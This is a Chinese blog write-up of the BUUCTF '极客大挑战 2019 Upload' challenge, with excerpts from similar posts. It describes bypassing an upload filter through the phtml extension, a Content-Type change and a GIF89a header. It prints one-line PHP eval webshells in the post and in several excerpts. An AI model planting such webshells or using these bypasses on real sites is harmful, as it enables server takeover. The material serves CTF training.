[极客大挑战 2019]Upload

最新推荐文章于 2025-04-03 19:01:12 发布
最新推荐文章于 2025-04-03 19:01:12 发布
阅读量162 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Buu-Web 文章标签: CTF WriteUp web安全 web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0sway/article/details/129144375
文章描述了一次网络安全挑战中,通过测试不同文件后缀(如phtml)和修改Content-Type来绕过过滤,最终成功执行PHP代码并获取到flag的历程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

## [极客大挑战 2019]Upload

进入靶场:
在这里插入图片描述

  • 文件上传的题目

  • 直接先传个php试试
    在这里插入图片描述

  • 不允许上传PHP

  • 尝试多种后缀:php3\php4\phtml等...
    在这里插入图片描述

  • 发现phtml可以绕过

  • 出现新的问题,:规则过滤了我们的<?

  • 试试script能不能绕过去
    在这里插入图片描述

  • 成功绕过后缀名的过滤

  • 出现新的问题:Don't lie to me, it's not image at all!!!

  • 看来是单改一个Content-Type不行,那么再在文件内容里面加上GIF的头
    在这里插入图片描述

  • 成功执行phpinfo()

  • 上马:<script language="php">eval($_POST['m0sway']);</script>
    在这里插入图片描述

  • 成功连接

  • 根目录下flag文件
    GET FLAG ! ! !

极客挑战2019-upload
m0_73303597的博客
12-11 432
自用
BUU_Web 极客挑战 Upload
qq_46635165的博客
09-26 330
打开题目网址,文件上传: 尝试上传 webshell.php ,一句话木马: 看来是不能上传 .php,抓包发现需要上传jpg格式图片: 将文件后缀格式改成 jpg 格式: <? 被检测,只能换一种一句话木马了,: <script language="php">eval($_POST['cmd']);</script> 提示检测到不完全是图片,写入 jpg 格式文件头,再次上传,仍然显示不完全是图片,写入GIF格式文件头:GIF89a ,再次尝试上传: 上传成功,接下来
[极客挑战 2019]Upload全网最详细WP
最新发布
siyue_secret的博客
04-03 348
但是从页面信息可知,网站不仅会检查文件类型,网站会检查文件内容。,因为网站后台可能在解析时可能会将其作为图片解析,不能达到我们的目的。我们先尝试构造一段“带漏洞”的php代码,命名为。,直接查看根目录下的文件(flag一般放在网站根目录中)(3)接下来,我们需要利用上传的这个“带漏洞”的文件来。文件夹,居然访问成功了,也可以在里面看到我们刚才上传的。所以我们在文件开头加上用于绕过此检测的GIF文件头。说明网站有一定的过滤机制,尝试将文件名改为。果然找到了flag,然后请求改为。的内容,并将其作为命令执行。
buuctf 极客挑战 upload
SopRomeo的博客
01-29 3554
最近接触了文件上传漏洞,刚好可以做这个题目了 普及下文件上传的漏洞: 根据一些bug可以把我们的木马文件上传进去从而达到控制服务器的目的 分享一下两位哥文件上传漏洞的技巧以及讲解 文件上传的常见技巧 文件上传漏洞的普通技巧与讲解 这道题百度了好久,才做出来 当个web狗真的难受 这道题考到了文件头绕过以及js代码绕过 先看看是不是黑名单 发现phtml可行 这边我在burpsuit试了很久才试...
CTF中的BUUCTF之[极客挑战 2019]Upload
weixin_44632787的博客
06-17 671
CTF中的BUUCTF之[极客挑战 2019]Upload 启动我们的挑战项目 这个界面,一看就知道是文件上传的类型的题目了 所以用我之前准备好的一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 之所以用这种一句话木马,是因为这种过滤方法比原版的:<?php @eval($_POST['attack']);?> 要好用。(个人观点) 将上面的一句话木马保存为1.png。 然后开
[极客挑战 2019]Upload 1
徐海洋
02-02 783
[极客挑战 2019]Upload 1
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2737
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
[极客挑战 2019]upload
04-02
### 如何参与极客挑战2019以及完成文件或作品的上传 #### 参与方式 华为云计划在未来两天举办一系列活动,其中包括丰富的专题论坛、圆桌论坛,还有Codelabs、极客挑战赛等活动[^1]。这些活动旨在让开发者能够与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值